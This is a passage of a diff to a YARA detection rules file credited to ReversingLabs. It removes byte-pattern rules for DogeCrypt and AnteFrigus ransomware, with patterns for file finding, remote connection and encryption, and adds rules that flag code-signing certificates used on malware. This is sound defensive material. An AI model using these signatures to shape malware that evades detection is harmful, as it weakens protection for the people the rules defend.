-            8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-        }
-		$decrypt_DesucryptKeyContainer_DogeCrypt = {
-            68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 8D 55 ?? 83 7D ?? ?? 8B 5D ?? 8B 35 ?? ?? ?? ?? 0F 43 D3 A1 ?? ?? ?? ?? 8B
-            4D ?? 2B C6 89 75 ?? 3B C8 77 ?? 83 3D ?? ?? ?? ?? ?? 8D 3C 31 8D 04 09 89 3D ?? ??
-            ?? ?? 50 8B 45 ?? BE ?? ?? ?? ?? 0F 43 35 ?? ?? ?? ?? 52 8D 04 46 50 E8 ?? ?? ?? ??
-            83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 52 C6 45 ?? ?? FF 75 ?? 51 B9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? ?? ??
-            8B C3 81 F9 ?? ?? ?? ?? 72 ?? 8B 5B ?? 83 C1 ?? 2B C3 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
-            ?? ?? 51 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 0F 43
-            05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? 68 ?? ??
-            ?? ?? 56 FF D3 83 F8 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 8D 45 ?? 6A ??
-            50 C6 07 ?? FF 35 ?? ?? ?? ?? 57 56 FF D3 83 F8 ?? 75 ?? BA ?? ?? ?? ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ??
-            ?? ?? 57 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? BA ?? ?? ?? ?? B9 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ??
-            ?? ?? EB ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ??
-            ?? ?? 8B E5 5D C3 E8 ?? ?? ?? ?? E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "We Build Toolbars LLC" and pe.signatures [ i ] . serial == "43:21:de:10:73:82:78:b9:36:83:ca:54:24:07:f1:03" and 1367884800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_2A6B2Df210Be14F4E18E10C7 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "150773ee-5d85-522d-a693-63bb6a7d1de2"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14548-L14564"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "24ae1664c35b7947e2e638bf620d9ab572c70df9cdc1403cc00b422a45ff9194"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $decrypt_DesucryptKeyContainer_DogeCrypt ) and ( $find_files_DogeCrypt ) and ( all of ( $encrypt_files_DogeCrypt_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "2a:6b:2d:f2:10:be:14:f4:e1:8e:10:c7" and 1472095404 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Antefrigus : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_412Ab2A50E8028Ddcbc499Ddf45F2045 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects AnteFrigus ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "903ac92c-1a4a-5645-92db-d00b3bfd6ada"
-		date = "2021-03-05"
-		modified = "2021-03-05"
+		id = "aabb3a66-5677-5359-9d81-92c8d4c7d910"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.AnteFrigus.yara#L1-L210"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14566-L14582"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b84c01da0ee97a4eb8bf099c71094f994feb4c7185ad75b8b2ccda5eee283a92"
+		logic_hash = "a5b85d13dee51d68af28394ecee3dcc2efe7add4d26c2a8033d1855b33ac6271"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "AnteFrigus"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 68 ?? ?? ?? ?? 8B D0
-            89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 83 65 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45
-            ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 33 C0 8D 7D
-            ?? AB AB AB 33 C0 89 45 ?? 89 45 ?? 89 45 ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ??
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 8B D0 C6 45 ?? ?? 8B 4A ?? 8B 7A ?? 2B
-            CF 39 4E ?? 76 ?? 8B 46 ?? 2B 46 ?? 3B C7 72 ?? 83 7A ?? ?? 72 ?? 8B 12 57 52 51 8B
-            CE E8 ?? ?? ?? ?? EB ?? 56 8B CA E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 85 ??
-            ?? ?? ?? ?? 8D 45 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            83 7D ?? ?? 8D 4D ?? 8B 45 ?? 0F 43 4D ?? 8D 04 41 8D 4D ?? 0F 43 4D ?? 51 50 51 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 83 65 ?? ?? 8D 4D ?? 83 65 ?? ?? 50 E8 ??
-            ?? ?? ?? C6 45 ?? ?? 8D 75 ?? 83 7D ?? ?? 8B 55 ?? 0F 43 75 ?? 85 D2 74 ?? 83 C9 ??
-            8D 42 ?? 3B C1 0F 42 C8 03 CE EB ?? 3B CE 74 ?? 49 80 39 ?? 75 ?? 2B CE EB ?? 83 C9
-            ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 8D 71 ?? C7 45 ?? ?? ?? ?? ?? C6 45
-        }
-		$find_files_p2 = {
-            3B D6 0F 82 ?? ?? ?? ?? 2B D6 8D 45 ?? 83 C9 ?? 83 FA ?? 0F 42 CA 83 7D ?? ?? 51 0F
-            43 45 ?? 8D 4D ?? 03 C6 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 45 ?? 50 83
-            61 ?? ?? 83 61 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 51 51 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
-            6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 70 ?? 03 30 3B F7 7D ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 3B F7 7D ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 8D 4D ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ??
-            ?? ?? 83 45 ?? ?? EB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ??
-            C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
-            ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 75 ?? 6A ?? 5B 3B F7 74 ?? 56 E8 ?? ?? ??
-            ?? 03 F3 59 3B F7 75 ?? 8B 7D ?? 8B 75 ?? 85 F6 74 ?? 3B F7 74 ?? 8B CE E8 ?? ?? ??
-            ?? 03 F3 3B F7 75 ?? 8B 75 ?? 8B 45 ?? 2B C6 99 F7 FB 6B C0 ?? 50 56 E8 ?? ?? ?? ??
-            59 59 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E8
-        }
-		$remote_connection_p1 = {
-            55 8D AC 24 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 85 ?? ?? ?? ?? 53 56 57 50 8D 45 ?? 64 A3
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 BA ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
-            ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 43
-            8D ?? ?? ?? ?? 03 F9 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? 0F 43 B5 ?? ?? ?? ?? 33 C0 66 89 85 ?? ?? ?? ?? 33 DB 8B C7 89 9D
-        }
-		$remote_connection_p2 = {
-            2B C6 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? EB ?? 66 0F BE 06 8D
-            8D ?? ?? ?? ?? 0F B7 C0 50 E8 ?? ?? ?? ?? 46 3B F7 75 ?? 53 53 53 53 68 ?? ?? ?? ??
-            C6 45 ?? ?? 88 5D ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 33 C0 50
-            6A ?? 50 50 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 45 ?? 85
-            C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 33 C9 51 51 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 8B F0 85 F6 74 ?? 33 C0 50 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68
-            ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ??
-            83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 FF D7 FF 75 ?? FF D7 53 FF
-            D7 80 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8D ?? ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 81
-            C5 ?? ?? ?? ?? C9 C3 8B 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ??
-            8D 95 ?? ?? ?? ?? C6 84 05 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ??
-            E9 ?? ?? ?? ?? E8
-        }
-		$encrypt_files_p1 = {
-            66 39 03 0F 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 33 C0 8D 8D ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8D 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 0F 43 95
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5B C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 39 9D ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 8D 04 41 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ??
-            ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 BA ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D
-        }
-		$encrypt_files_p2 = {
-            8D ?? ?? ?? ?? 83 C4 ?? 3B C8 74 ?? 33 C9 88 4D ?? 8D 8D ?? ?? ?? ?? FF 75 ?? 50 E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 56 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 C0 59 89 85 ??
-            ?? ?? ?? 89 8D ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 88
-            85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 45 ?? ?? 57 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 8D 4D
-            ?? E8 ?? ?? ?? ?? 33 C0 C6 45 ?? ?? 57 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 59 99 F7 F9 8D 4D ??
-            52 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 59 99 F7 F9 8D 8D ?? ?? ?? ?? 52 E8 ?? ?? ??
-            ?? 83 EB ?? 75 ?? 8D 95 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 51 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ??
-            ?? ?? ?? 39 9D ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? FF B5 ?? ??
-            ?? ?? 0F 43 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 8D 8D ??
-            ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 45 ??
-            C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51
-        }
-		$encrypt_files_p3 = {
-            8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 45 ?? C6 45 ?? ?? 50 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ??
-            ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ??
-            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 8B F3 39 B5 ?? ?? ?? ?? 76 ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8A 04 30 04 ?? 88 45 ?? FF 75 ?? E8 ?? ?? ??
-            ?? 46 3B B5 ?? ?? ?? ?? 72 ?? 8B F3 39 B5 ?? ?? ?? ?? 76 ?? 83 BD ?? ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8A 04 30 2C ?? 88 45 ?? FF 75
-            ?? E8 ?? ?? ?? ?? 46 3B B5 ?? ?? ?? ?? 72 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 50 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43
-        }
-		$encrypt_files_p4 = {
-            85 ?? ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? BE ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 56 50 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ??
-            ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
-            ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
-            C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45
-            ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ??
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
-            59 59 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ??
-            ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ??
-            ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 8D
-        }
-		$encrypt_files_p5 = {
-            85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85 ?? ?? ?? ?? 51 50 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ??
-            ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 50 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D
-            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
-        }
-		$encrypt_files_p6 = {
-            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
